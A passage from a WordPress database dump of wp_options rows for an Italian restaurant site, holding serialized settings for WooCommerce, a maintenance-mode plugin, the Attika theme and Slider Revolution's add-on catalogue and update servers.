interested\";}}s:4:\"wait\";s:2:\"30\";}}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:0:{}}','yes'),(265125,'woocommerce_version','4.9.2','yes'),(265126,'woocommerce_db_version','4.9.2','yes'),(279465,'rsssl_upgraded_to_four','1','yes'),(279466,'rsssl_mixed_content_scan_dismissed','1','yes'),(279467,'rsssl_google_analytics_dismissed','1','yes'),(286238,'rsssl_remaining_tasks','1','yes'),(286279,'maintenance_meta','a:3:{s:13:\"first_version\";s:3:\"3.8\";s:13:\"first_install\";i:1607161525;s:11:\"old_version\";b:0;}','yes'),(286280,'mtnc_db_version','2','yes'),(286281,'maintenance_options','a:24:{s:10:\"page_title\";s:20:\"Sito in manutenzione\";s:7:\"heading\";s:22:\"Maintenance mode is on\";s:11:\"description\";s:57:\"Site will be available soon. Thank you for your patience!\";s:11:\"footer_text\";s:40:\"© Sol Y Mar, ristorante a Riccione 2020\";s:10:\"logo_width\";s:3:\"220\";s:11:\"logo_height\";s:0:\"\";s:4:\"logo\";s:1:\"0\";s:11:\"retina_logo\";s:1:\"0\";s:7:\"body_bg\";s:4:\"1272\";s:17:\"bg_image_portrait\";s:1:\"0\";s:13:\"preloader_img\";s:1:\"0\";s:13:\"body_bg_color\";s:7:\"#111111\";s:10:\"font_color\";s:7:\"#ffffff\";s:17:\"controls_bg_color\";s:7:\"#111111\";s:16:\"body_font_family\";s:9:\"Open Sans\";s:16:\"body_font_subset\";s:3:\"300\";s:15:\"gg_analytics_id\";s:0:\"\";s:14:\"blur_intensity\";s:1:\"5\";s:8:\"is_login\";s:1:\"1\";s:10:\"custom_css\";s:0:\"\";s:5:\"state\";i:0;s:2:\"ID\";i:0;s:6:\"filter\";s:2:\"db\";s:16:\"default_settings\";b:0;}','yes'),(286284,'theme_mods_attika','a:4:{i:0;b:0;s:18:\"nav_menu_locations\";a:6:{s:15:\"main-navigation\";i:74;s:17:\"mobile-navigation\";i:74;s:23:\"divided-left-navigation\";i:80;s:24:\"divided-right-navigation\";i:81;s:16:\"popup-navigation\";i:72;s:19:\"vertical-navigation\";i:73;}s:18:\"custom_css_post_id\";i:-1;s:16:\"sidebars_widgets\";a:2:{s:4:\"time\";i:1607338178;s:4:\"data\";a:25:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"sidebar\";a:5:{i:0;s:8:\"search-2\";i:1;s:12:\"categories-2\";i:2;s:23:\"mkdf_blog_list_widget-2\";i:3;s:23:\"mkdf_instagram_widget-3\";i:4;s:32:\"mkdf_social_icons_group_widget-5\";}s:19:\"footer_top_column_1\";a:0:{}s:19:\"footer_top_column_2\";a:0:{}s:19:\"footer_top_column_3\";a:0:{}s:19:\"footer_top_column_4\";a:0:{}s:22:\"footer_bottom_column_1\";a:3:{i:0;s:13:\"media_image-2\";i:1;s:6:\"text-2\";i:2;s:32:\"mkdf_social_icons_group_widget-4\";}s:22:\"footer_bottom_column_2\";a:0:{}s:22:\"footer_bottom_column_3\";a:0:{}s:27:\"mkdf-header-widget-area-one\";a:1:{i:0;s:32:\"mkdf_social_icons_group_widget-2\";}s:27:\"mkdf-header-widget-area-two\";a:1:{i:0;s:23:\"mkdf_side_area_opener-2\";}s:8:\"sidearea\";a:3:{i:0;s:13:\"media_image-3\";i:1;s:6:\"text-5\";i:2;s:6:\"text-6\";}s:26:\"fullscreen_search_column_1\";a:0:{}s:26:\"fullscreen_search_column_2\";a:0:{}s:26:\"fullscreen_search_column_3\";a:0:{}s:27:\"mkdf-right-from-mobile-logo\";a:0:{}s:17:\"mkdf-sticky-right\";a:1:{i:0;s:23:\"mkdf_side_area_opener-5\";}s:17:\"mkdf-top-bar-left\";a:0:{}s:18:\"mkdf-top-bar-right\";a:0:{}s:12:\"shop-sidebar\";a:8:{i:0;s:23:\"mkdf_separator_widget-2\";i:1;s:28:\"woocommerce_product_search-2\";i:2;s:32:\"woocommerce_product_categories-2\";i:3;s:26:\"woocommerce_price_filter-2\";i:4;s:22:\"woocommerce_products-2\";i:5;s:23:\"mkdf_instagram_widget-2\";i:6;s:23:\"mkdf_separator_widget-4\";i:7;s:32:\"mkdf_social_icons_group_widget-3\";}s:19:\"shop-header-widgets\";a:2:{i:0;s:32:\"mkdf_woocommerce_dropdown_cart-2\";i:1;s:23:\"mkdf_side_area_opener-3\";}s:9:\"left-menu\";a:2:{i:0;s:23:\"mkdf_separator_widget-3\";i:1;s:6:\"text-3\";}s:13:\"custom-opener\";a:1:{i:0;s:23:\"mkdf_side_area_opener-4\";}s:15:\"logo-fullscreen\";a:1:{i:0;s:13:\"media_image-4\";}s:13:\"custom-sticky\";a:1:{i:0;s:32:\"mkdf_social_icons_group_widget-6\";}}}}','yes'),(286293,'revslider_servers','a:7:{i:0;s:22:\"themepunch-ext-a.tools\";i:1;s:22:\"themepunch-ext-b.tools\";i:2;s:22:\"themepunch-ext-b.tools\";i:3;s:22:\"themepunch-ext-b.tools\";i:4;s:16:\"themepunch.tools\";i:5;s:22:\"themepunch-ext-a.tools\";i:6;s:22:\"themepunch-ext-a.tools\";}','yes'),(286294,'revslider_server_refresh','1618438633','yes'),(286295,'revslider-connection','1','yes'),(286296,'revslider-update-hash','27398a2f3718f5421306a4232a116763','yes'),(286297,'revslider-stable-version','4.2.0','yes'),(286298,'revslider-additions','O:8:\"stdClass\":1:{s:7:\"selling\";b:1;}','yes'),(286299,'rs-addons-counter','30','yes'),(286300,'revslider-addons','O:8:\"stdClass\":29:{s:22:\"revslider-backup-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:22:\"revslider-backup-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Backup\";s:6:\"line_1\";s:12:\"Make Backups\";s:6:\"line_2\";s:25:\"Revisions for your safety\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_backup.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BU\";}}s:23:\"revslider-gallery-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-gallery-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"WordPress Gallery\";s:6:\"line_1\";s:31:\"Replace the standard WP Gallery\";s:6:\"line_2\";s:31:\"with the Sliders of your choice\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpgallery.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"GA\";}}s:25:\"revslider-rel-posts-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-rel-posts-addon\";s:12:\"version_from\";s:7:\"5.2.4.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Related Posts\";s:6:\"line_1\";s:25:\"Add related Posts Sliders\";s:6:\"line_2\";s:31:\"at the end of your post content\";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wprelated.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RP\";}}s:26:\"revslider-typewriter-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-typewriter-addon\";s:12:\"version_from\";s:5:\"5.3.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:17:\"Typewriter Effect\";s:6:\"line_1\";s:27:\"Enhance your slider\'s text \";s:6:\"line_2\";s:24:\"with typewriter effects \";s:9:\"available\";s:5:\"2.0.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_typewriter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"TW\";}}s:23:\"revslider-sharing-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-sharing-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Social Sharing\";s:6:\"line_1\";s:17:\"Share your slides\";s:6:\"line_2\";s:50:\"with RevSlider \"actions\" because sharing is caring\";s:9:\"available\";s:5:\"2.0.5\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:80:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_socialsharing.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SH\";}}s:27:\"revslider-maintenance-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-maintenance-addon\";s:12:\"version_from\";s:5:\"5.3.1\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:15:\"Coming & Maint.\";s:6:\"line_1\";s:37:\"Simple Coming Soon & Maintenance Page\";s:6:\"line_2\";s:42:\"Let your visitors know what\'s up and when!\";s:9:\"available\";s:5:\"2.1.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:84:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_underconstruction.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:20:\"revslider-snow-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:20:\"revslider-snow-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Holiday Snow\";s:6:\"line_1\";s:12:\"Let it snow!\";s:6:\"line_2\";s:32:\"Add animated snow to any Slider \";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:71:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_snow.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SN\";}}s:24:\"revslider-polyfold-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-polyfold-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:22:\"Polyfold Scroll Effect\";s:6:\"line_1\";s:32:\"Add sharp edges to your sliders \";s:6:\"line_2\";s:35:\"as they scroll into and out of view\";s:9:\"available\";s:5:\"2.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_polyfold.jpg\";s:5:\"color\";s:7:\"#3e186f\";s:4:\"text\";s:2:\"PF\";}}s:19:\"revslider-404-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:19:\"revslider-404-addon\";s:12:\"version_from\";s:3:\"5.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:3:\"404\";s:6:\"line_1\";s:39:\"Build custom 404 \"Page not Found\" Pages\";s:6:\"line_2\";s:28:\"with Slider Revolution swag!\";s:9:\"available\";s:5:\"2.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:70:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_404.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"404\";}}s:30:\"revslider-prevnext-posts-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:30:\"revslider-prevnext-posts-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Adjacent Posts\";s:6:\"line_1\";s:30:\"Display previous and next post\";s:6:\"line_2\";s:28:\"to the currently showing one\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpadjacent.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:25:\"revslider-filmstrip-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-filmstrip-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Filmstrip\";s:6:\"line_1\";s:44:\"Display a continously rotating set of images\";s:6:\"line_2\";s:26:\"for your slide backgrounds\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_filmstrip.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FS\";}}s:21:\"revslider-login-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:21:\"revslider-login-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Login Page\";s:6:\"line_1\";s:25:\"Very simple WP Login Page\";s:6:\"line_2\";s:34:\"enhanced with your favorite slider\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:72:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_login.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LI\";}}s:24:\"revslider-featured-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-featured-addon\";s:12:\"version_from\";s:3:\"5.4\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:20:\"Post Featured Slider\";s:6:\"line_1\";s:25:\"Display a featured Slider\";s:6:\"line_2\";s:41:\"instead of a featured Image in your Posts\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:1;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_wpfeatured.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"FT\";}}s:23:\"revslider-weather-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-weather-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Weather\";s:6:\"line_1\";s:21:\"Every where you go...\";s:6:\"line_2\";s:36:\"...always take the weather with you!\";s:9:\"available\";s:5:\"2.0.2\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:9:\"Configure\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_weather.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WT\";}}s:24:\"revslider-panorama-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-panorama-addon\";s:12:\"version_from\";s:7:\"5.4.5.2\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"Panorama\";s:6:\"line_1\";s:14:\"Panorama AddOn\";s:6:\"line_2\";s:25:\"Display images in 360Â°\";s:9:\"available\";s:5:\"2.1.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:75:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_panorama.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PN\";}}s:30:\"revslider-duotonefilters-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:30:\"revslider-duotonefilters-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:7:\"Duotone\";s:6:\"line_1\";s:7:\"Duotone\";s:6:\"line_2\";s:25:\"Because one is not enough\";s:9:\"available\";s:5:\"2.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:74:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_duotone.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:3:\"DTF\";}}s:23:\"revslider-refresh-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:23:\"revslider-refresh-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:8:\"(Re)Load\";s:6:\"line_1\";s:39:\"Reload the current page or a custom URL\";s:6:\"line_2\";s:34:\"after a certain time, loops, slide\";s:9:\"available\";s:5:\"2.0.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_reload.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RF\";}}s:28:\"revslider-liquideffect-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:28:\"revslider-liquideffect-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Distortion\";s:6:\"line_1\";s:22:\"Add Distortion Effects\";s:6:\"line_2\";s:30:\"to your slides and transitions\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_distortion.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"LE\";}}s:31:\"revslider-explodinglayers-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:31:\"revslider-explodinglayers-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Exploding Layers\";s:6:\"line_1\";s:23:\"Add explosive particles\";s:6:\"line_2\";s:24:\"to your layers animation\";s:9:\"available\";s:5:\"2.1.3\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_exploding.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"EL\";}}s:26:\"revslider-paintbrush-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-paintbrush-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Paintbrush\";s:6:\"line_1\";s:14:\"Paint or Erase\";s:6:\"line_2\";s:22:\"your background images\";s:9:\"available\";s:5:\"2.1.9\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_paintbrush.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PB\";}}s:29:\"revslider-domain-switch-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:29:\"revslider-domain-switch-addon\";s:12:\"version_from\";s:5:\"6.0.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:13:\"Domain Switch\";s:6:\"line_1\";s:17:\"Switch Image URLs\";s:6:\"line_2\";s:37:\"in sliders from one domain to another\";s:9:\"available\";s:5:\"1.0.1\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:79:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_domainswitch.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"DS\";}}s:25:\"revslider-mousetrap-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-mousetrap-addon\";s:12:\"version_from\";s:6:\"6.2.23\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:9:\"Mousetrap\";s:6:\"line_1\";s:31:\"Create all kinds of interesting\";s:6:\"line_2\";s:19:\" mouse interactions\";s:9:\"available\";s:5:\"2.0.8\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_mousetrap.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"MT\";}}s:26:\"revslider-whiteboard-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:26:\"revslider-whiteboard-addon\";s:12:\"version_from\";s:5:\"5.2.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:10:\"Whiteboard\";s:6:\"line_1\";s:31:\"Create Hand-Drawn Presentations\";s:6:\"line_2\";s:45:\"that are understandable, memorable & engaging\";s:9:\"available\";s:5:\"2.2.3\";s:10:\"background\";s:81:\"//updates.themepunch-ext-a.tools/revslider/addons/images/whiteboard_widget_bg.jpg\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:77:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_whiteboard.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"WB\";}}s:27:\"revslider-scrollvideo-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-scrollvideo-addon\";s:12:\"version_from\";s:5:\"6.3.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:12:\"Scroll Video\";s:6:\"line_1\";s:114:\"This addon allows you to generate a sequence of images from any html5 video and play them with scroll interaction.\";s:6:\"line_2\";s:49:\"Quality options are included for optimal results!\";s:9:\"available\";s:5:\"2.0.4\";s:10:\"background\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_scrollvideo.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SV\";}}s:22:\"revslider-slicey-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:22:\"revslider-slicey-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Slicey\";s:6:\"line_1\";s:20:\"Slice \'em up nicely!\";s:6:\"line_2\";s:38:\"Create image slices of your background\";s:9:\"available\";s:5:\"2.0.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_slicey.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"SL\";}}s:24:\"revslider-revealer-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:24:\"revslider-revealer-addon\";s:12:\"version_from\";s:5:\"6.2.3\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:6:\"Reveal\";s:6:\"line_1\";s:9:\"Reveal...\";s:6:\"line_2\";s:37:\"...your inner beast... and RevSliders\";s:9:\"available\";s:5:\"2.1.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:73:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_reveal.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"RV\";}}s:25:\"revslider-particles-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:25:\"revslider-particles-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:16:\"Particle Effects\";s:6:\"line_1\";s:17:\"Let\'s Parti(cle)!\";s:6:\"line_2\";s:51:\"Add interactive particle animations to your sliders\";s:9:\"available\";s:5:\"2.2.6\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:11:\"How to use?\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:76:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_particles.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"PT\";}}s:27:\"revslider-beforeafter-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-beforeafter-addon\";s:12:\"version_from\";s:5:\"5.4.6\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:14:\"Before & After\";s:6:\"line_1\";s:35:\"Compare two slides before and after\";s:6:\"line_2\";s:33:\"use it vertically or horizontally\";s:9:\"available\";s:5:\"2.0.8\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_beforeafter.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BA\";}}s:27:\"revslider-bubblemorph-addon\";O:8:\"stdClass\":11:{s:4:\"slug\";s:27:\"revslider-bubblemorph-addon\";s:12:\"version_from\";s:5:\"6.0.0\";s:10:\"version_to\";s:5:\"9.9.9\";s:5:\"title\";s:11:\"BubbleMorph\";s:6:\"line_1\";s:26:\"Include BubbleMorph Layers\";s:6:\"line_2\";s:33:\"for a decorative lava lamp effect\";s:9:\"available\";s:5:\"2.2.0\";s:10:\"background\";s:0:\"\";s:6:\"button\";s:6:\"How To\";s:6:\"global\";b:0;s:4:\"logo\";O:8:\"stdClass\":3:{s:3:\"img\";s:78:\"//updates.themepunch-ext-a.tools/revslider/addons/images/addon_bubblemorph.jpg\";s:5:\"color\";s:0:\"\";s:4:\"text\";s:2:\"BM\";}}}','yes'),(286301,'revslider-library-check','1617777200','yes'),(286302,'revslider-library-hash','dae3de1eb57eeeee008b70e9a23844b5','yes');
INSERT INTO `wp_options` VALUES (286303,'rs-library','a:3:{s:4:\"hash\";s:32:\"dae3de1eb57eeeee008b70e9a23844b5\";s:7:\"objects\";a:417:{i:0;a:12:{s:2:\"id\";s:3:\"198\";s:6:\"handle\";s:16:\"object_dvd_1.png\";s:4:\"name\";s:3:\"DVD\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"4\";s:6:\"handle\";s:5:\"music\";s:4:\"name\";s:5:\"Music\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1000\";s:6:\"height\";s:4:\"1000\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-10-17 12:43:17\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:1;a:12:{s:2:\"id\";s:3:\"188\";s:6:\"handle\";s:18:\"object_plant_1.png\";s:4:\"name\";s:7:\"Plant 1\";s:4:\"tags\";a:1:{i:0;a:3:{s:2:\"id\";s:2:\"18\";s:6:\"handle\";s:4:\"misc\";s:4:\"name\";s:4:\"Misc\";}}s:11:\"description\";s:8:\"New File\";s:5:\"width\";s:4:\"1500\";s:6:\"height\";s:4:\"1500\";s:7:\"version\";s:3:\"1.0\";s:14:\"plugin_version\";s:0:\"\";s:5:\"added\";s:19:\"2016-09-12 16:25:27\";s:6:\"active\";s:1:\"1\";s:4:\"type\";s:1:\"1\";}i:2;a:12:{s:2:\"id\";s:3:\"187\";s:6:\"handle\";s:16:\"object_pen_1.png\";s:4:\"name\";s:5:\"Pen 1\";s:4:\"tags\";a:2:{i:0;a:3:{s:2:\"id\";s:1:\"5\";s:6:\"handle\";s:3:\"art\";s:4:\"name\";s:3:\"Art\";}i:1;a:3:{s:2:\"id\";s:1:\"3\";s:6:\"handle\";s:6:\"office\";s:4:\"name\";s:6:\"Office\";}}s:11:\"description\";s:8:\"New 